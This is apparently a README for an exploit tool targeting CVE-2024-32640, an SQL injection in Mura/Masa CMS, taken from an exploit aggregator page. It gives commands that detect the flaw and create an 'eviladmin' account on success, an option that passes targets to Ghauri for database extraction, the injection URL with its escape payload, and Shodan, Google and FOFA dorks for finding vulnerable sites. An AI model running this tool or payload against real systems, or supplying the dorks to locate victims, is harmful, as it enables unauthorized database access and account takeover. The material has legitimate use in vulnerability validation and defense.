Share
## https://sploitus.com/exploit?id=07DCBD0F-60A6-5754-84F4-D40849858CFD
# Muraider - Automating the detection & Exploitation of CVE-2024-32640 \ SQLi in Mura/Masa CMS

# Usage

## Detection:
`python3 CVE-2024-32640.py --url https://target.com/`

#[+] On Success the script will create the user eviladmin on Mura/Masa CMS

## Ghauri Exploitation (Pass '-g' or '--ghauri' as argument):

Parse in any arguments that you wish to use with Ghauri, following their argument list:

`python3 CVE-2024-32640.py --url https://target.com -g "--dbs --current-db"`

`python3 CVE-2024-32640.py --url https://target.com --ghauri "--dbs --current-db"`

# Example

![image](https://github.com/Stuub/CVE-2024-32640-SQLI-MuraCMS/assets/60468836/c728db35-ece0-4ef2-9980-534be54def07)

# Ghauri SQLI Auotmation:

Using the detection that I've implemented into the tool, we can then use the vulnerable target to exploit in Ghauri. The script automates this process, parsing all the target information needed into a call to Ghauri.

![image](https://github.com/Stuub/CVE-2024-32640-SQLI-MuraCMS/assets/60468836/afbc4b6f-2310-48c2-b9b1-9cd2039be1ab)


# Details

By appending an escape sequence (`%5c`) to the contenthisid HTML Query Parameter value, we're able to verify if a target is vulnerbale to this SQLi. 

Successful exploitation could lead to unauthorized access to sensitive data.

URL: `https://target.com/_api/json/v1/default/?method=processAsyncObject&object=displayregion&contenthistid=x%5c'&previewID=x`

# Dorks

Shodan-query: `'Generator: Masa CMS'`

Google: `"powered by Mura CMS"`

FOFA: `app="Mura-CMS"`

## Disclaimer

Please exercise caution when using this PoC. It has been strictly developed to serve as a tool automate the validation of the vulnerability.
Any misuse caused is at your own responsibility.